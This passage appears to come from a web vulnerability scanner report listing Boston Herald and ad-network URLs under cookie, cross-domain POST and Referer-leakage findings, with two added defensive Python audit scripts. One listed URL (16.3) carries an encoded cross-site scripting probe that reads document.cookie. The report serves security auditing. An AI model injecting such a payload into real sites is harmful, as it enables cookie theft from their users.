14.2. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

14.3. http://c.brightcove.com/services/viewer/federated_f9

14.4. http://onset.freedom.com/fi/analytics/cms/

14.5. http://twitter.com/malsup

14.6. http://www.screenthumbs.com/tools/js/linkthumbs.js

15. Cross-domain POST

15.1. http://www.bostonherald.com/store/

15.2. http://www.bostonherald.com/store/

15.3. http://www.bostonherald.com/store/

15.4. http://www.bostonherald.com/store/

15.5. http://www.bostonherald.com/store/

15.6. http://www.bostonherald.com/store/

15.7. http://www.bostonherald.com/store/

15.8. http://www.bostonherald.com/store/

15.9. http://www.bostonherald.com/store/

15.10. http://www.bostonherald.com/store/

15.11. http://www.bostonherald.com/store/

15.12. http://www.bostonherald.com/store/

15.13. http://www.bostonherald.com/store/

15.14. http://www.bostonherald.com/store/

15.15. http://www.bostonherald.com/store/

15.16. http://www.bostonherald.com/store/

15.17. http://www.bostonherald.com/store/

15.18. http://www.bostonherald.com/store/

15.19. http://www.bostonherald.com/store/

15.20. http://www.bostonherald.com/store/
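
The "Cross-domain POST" class above and the "Cross-domain Referer leakage" class listed under 17 below both come down to where a page sends data: a form whose action is on another origin, and a link or resource fetch that hands this page's URL, query string included, to another origin in the Referer header. The following is an added example, not code from the crawler report, that runs both checks over a page's HTML. The page URL, host names and HTML are constructed for illustration and do not come from any site in the report.

```python
"""Find forms that POST cross-origin and cross-origin references that
would carry this page's URL in the Referer header.

Added example, not code from the crawler report. The page URL and HTML
below are constructed for illustration; the hosts are made up.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

_DEFAULT_PORT = {"http": 80, "https": 443}


def origin(url):
    """(scheme, host, port) triple used for same-origin comparison."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return scheme, (p.hostname or "").lower(), p.port or _DEFAULT_PORT.get(scheme)


class _RefCollector(HTMLParser):
    """Collect form targets and outbound references in document order."""

    def __init__(self):
        super().__init__()
        self.forms = []       # (method, action)
        self.references = []  # (tag, url)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(((a.get("method") or "get").lower(), a.get("action") or ""))
        elif tag in ("script", "img", "iframe", "embed", "frame") and a.get("src"):
            self.references.append((tag, a["src"]))
        elif tag in ("a", "link") and a.get("href"):
            self.references.append((tag, a["href"]))


def audit_page(page_url, html):
    """Return (cross_domain_post_targets, referer_leak_targets)."""
    collector = _RefCollector()
    collector.feed(html)
    page_origin = origin(page_url)
    page_scheme = page_origin[0]

    # Cross-domain POST: a form that submits to a different origin.
    cross_post = []
    for method, action in collector.forms:
        target = urljoin(page_url, action)
        if method == "post" and origin(target) != page_origin:
            cross_post.append(target)

    # Referer leakage: only worth reporting when the page URL carries
    # data in its query string, since that is what the Referer exposes.
    leaks = []
    if urlsplit(page_url).query:
        for tag, ref in collector.references:
            target = urljoin(page_url, ref)
            t_scheme = urlsplit(target).scheme.lower()
            if t_scheme not in ("http", "https"):
                continue  # javascript:, mailto:, data: carry no Referer
            if page_scheme == "https" and t_scheme == "http":
                continue  # browsers drop Referer on an https -> http downgrade
            if origin(target) != page_origin:
                leaks.append((tag, target))
    return cross_post, leaks


# Constructed sample page: hosts and content are made up.
SAMPLE_URL = "http://news.example/story/view.bg?format=comments&srvc=home"
SAMPLE_HTML = """
<html><body>
<script src="http://ads.example/ads.js"></script>
<img src="/images/logo.gif">
<form method="POST" action="https://store.example/checkout">
  <input name="item" value="subscription"></form>
<form action="/search/"><input name="q"></form>
<a href="https://share.example/post">Share</a>
<a href="javascript:void(0)">Print</a>
</body></html>
"""

if __name__ == "__main__":
    posts, leaks = audit_page(SAMPLE_URL, SAMPLE_HTML)
    for target in posts:
        print("cross-domain POST ->", target)
    for tag, target in leaks:
        print(f"Referer leak via <{tag}> ->", target)
```

Two caveats when reading results. A cross-domain POST is only interesting if the form carries something sensitive (credentials, payment data), and the same parser applied from the receiving side is the starting point for a CSRF review. The Referer check models the browser behaviour of the report's era and of pages that set a relaxed Referrer-Policy (`no-referrer-when-downgrade` or `unsafe-url`); under the current default, `strict-origin-when-cross-origin`, a cross-origin request carries only the page's origin, not its path and query string.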

16. SSL cookie without secure flag set

16.1. https://base.liveperson.net/hc/5296924/

16.2. https://base.liveperson.net/hc/5296924/

16.3. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/
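
For the "SSL cookie without secure flag set" class above, the check is a header-level one: a cookie issued over HTTPS without the Secure attribute is also sent by the browser on any plain-HTTP request to the same host, so anyone who can inject a link to an http:// URL on that host, or observe that traffic, can obtain it. The following is an added example, not code from the crawler report, that parses Set-Cookie headers and reports cookies missing Secure (and, as a related informational check, HttpOnly). The response URL and headers are constructed for illustration and were not captured from any host in the report.

```python
"""Audit Set-Cookie headers from a TLS response for the Secure flag.

Added example, not code from the crawler report. The response URL and
headers below are constructed for illustration and were not captured
from any host listed in the report.
"""
from urllib.parse import urlsplit


def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (name, attributes).

    Attribute names are lower-cased; valueless attributes such as
    Secure and HttpOnly map to True, the rest to their string value.
    """
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, _value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip() if value else True
    return name.strip(), attrs


def audit_cookies(response_url, set_cookie_headers):
    """Return {cookie name: [problems]} for every cookie the response sets.

    'missing Secure' is only reported when the response itself came over
    https; on a plain-http response the flag cannot protect anything.
    """
    over_tls = urlsplit(response_url).scheme.lower() == "https"
    report = {}
    for header in set_cookie_headers:
        name, attrs = parse_set_cookie(header)
        problems = []
        if over_tls and "secure" not in attrs:
            problems.append("missing Secure")
        if "httponly" not in attrs:
            problems.append("missing HttpOnly")
        report[name] = problems
    return report


def insecure_cookie_names(response_url, set_cookie_headers):
    """Names of cookies matching the 'SSL cookie without secure flag' class."""
    report = audit_cookies(response_url, set_cookie_headers)
    return sorted(name for name, problems in report.items() if "missing Secure" in problems)


# Constructed sample: a TLS response that sets three cookies.
SAMPLE_URL = "https://chat.example/hc/12345/"
SAMPLE_SET_COOKIE = [
    "lpsession=7d3f9a2c; Path=/; HttpOnly",
    "csrf=Q2x0dXJl; Path=/; Secure",
    "prefs=lang%3Den; Path=/; Expires=Sat, 29-Jan-2011 08:38:47 GMT",
]

if __name__ == "__main__":
    for cookie, problems in audit_cookies(SAMPLE_URL, SAMPLE_SET_COOKIE).items():
        print(f"{cookie}: {', '.join(problems) or 'ok'}")
```

When feeding this from a live response, collect the headers with `response.headers.get_all("Set-Cookie")` (or the equivalent multi-value accessor in your client) rather than a single `get`, which joins multiple Set-Cookie headers with commas and breaks parsing because Expires values contain a comma themselves.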

17. Cross-domain Referer leakage

17.1. http://a.tribalfusion.com/j.ad

17.2. http://a.tribalfusion.com/j.ad

17.3. http://ad.afy11.net/ad

17.4. http://ad.afy11.net/ad

17.5. http://ad.afy11.net/ad

17.6. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

17.7. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

17.8. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

17.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

17.10. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

17.11. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

17.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

17.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

17.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

17.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

17.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

17.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.23. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.24. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.29. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.30. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.31. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.32. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.33. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.34. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.35. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.36. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.37. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.38. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.39. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.40. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.41. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.42. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.43. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.44. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.45. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.46. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

17.47. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

17.48. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5

17.49. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

17.50. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7

17.51. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

17.52. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

17.53. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

17.54. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

17.55. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

17.56. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

17.57. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

17.58. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

17.59. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

17.60. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

17.61. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

17.62. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

17.63. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54

17.64. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54

17.65. http://ad.doubleclick.net/adj/N3340.trfu/B5083632.138

17.66. http://ad.doubleclick.net/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

17.67. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2

17.68. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2

17.69. http://ad.doubleclick.net/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46

17.70. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6

17.71. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6

17.72. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.73. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.74. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.75. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.76. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.77. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.78. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.79. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified

17.80. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment

17.81. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment/events

17.82. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/weather

17.83. http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience

17.84. http://ad.turn.com/server/ads.js

17.85. http://ad.turn.com/server/ads.js

17.86. http://ad.turn.com/server/ads.js

17.87. http://ad.turn.com/server/ads.js

17.88. http://ad.turn.com/server/ads.js

17.89. http://ad.turn.com/server/ads.js

17.90. http://ad.turn.com/server/ads.js

17.91. http://ads.bluelithium.com/st

17.92. http://ads.roiserver.com/disp

17.93. http://adsfac.us/link.asp

17.94. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

17.95. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

17.96. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

17.97. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

17.98. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

17.99. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

17.100. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

17.101. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

17.102. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

17.104. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

17.105. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

17.106. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

17.107. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

17.108. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

17.109. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

17.110. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

17.111. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

17.112. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

17.113. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

17.114. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

17.115. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

17.116. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

17.117. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

17.118. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

17.119. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

17.120. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

17.121. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

17.122. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

17.123. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

17.124. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

17.125. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

17.126. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

17.127. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

17.128. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

17.129. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

17.130. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

17.131. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

17.132. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

17.133. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

17.134. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

17.135. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

17.136. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

17.137. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

17.138. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

17.139. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

17.140. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

17.141. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

17.142. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

17.143. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

17.144. https://base.liveperson.net/hc/5296924/

17.145. http://bh.heraldinteractive.com/includes/processAds.bg

17.146. http://bh.heraldinteractive.com/includes/processAds.bg

17.147. http://bh.heraldinteractive.com/includes/processAds.bg

17.148. http://bh.heraldinteractive.com/includes/processAds.bg

17.149. http://bh.heraldinteractive.com/includes/processAds.bg

17.150. http://boston30.autochooser.com/results.asp

17.151. http://bostonherald.com/blogs/entertainment/the_assistant/

17.152. http://bostonherald.com/blogs/lifestyle/fork_lift/

17.153. http://bostonherald.com/news/document.bg

17.154. http://bostonherald.com/projects/your_tax_dollars.bg

17.155. http://bostonherald.com/search/

17.156. http://bostonherald.com/search/

17.157. http://bostonherald.com/sports/football/patriots/view.bg

17.158. http://bostonherald.com/track/inside_track/

17.159. http://bostonherald.com/track/inside_track/view.bg

17.160. http://bostonherald.com/track/inside_track/view.bg

17.161. http://bostonherald.com/track/inside_track/view.bg

17.162. http://bostonherald.com/track/star_tracks/

17.163. http://bostonherald.com/track/star_tracks/view.bg

17.164. http://bostonherald.com/track/star_tracks/view.bg

17.165. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

17.166. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

17.167. http://common.onset.freedom.com/fi/adsense/

17.168. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.169. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.170. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.171. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.172. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.173. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.174. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.175. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.176. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.177. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.178. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.179. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.180. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.181. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

17.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

17.184. http://digg.com/submit

17.185. http://events.cbs6albany.com/

17.186. http://events.cbs6albany.com/

17.187. http://events.cbs6albany.com/search

17.188. http://events.cbs6albany.com/user/login

17.189. http://events.cbs6albany.com/user/signup

17.190. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

17.191. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

17.192. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

17.193. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

17.194. http://ib.adnxs.com/ab

17.195. http://ib.adnxs.com/ptj

17.196. http://jqueryui.com/themeroller/

17.197. http://local.nissanusa.com/zip.aspx

17.198. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

17.199. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.200. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.201. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.202. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.203. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

17.204. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

17.205. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

17.206. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

17.207. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

17.208. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1381389243/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

17.209. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

17.210. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

17.211. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

17.212. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

17.213. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

17.214. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

17.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

17.216. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

17.217. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

17.218. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

17.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

17.220. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

17.221. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

17.222. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

17.223. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

17.224. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

17.225. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

17.226. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663

17.227. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35

17.228. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35

17.229. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663

17.230. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

17.231. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.232. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

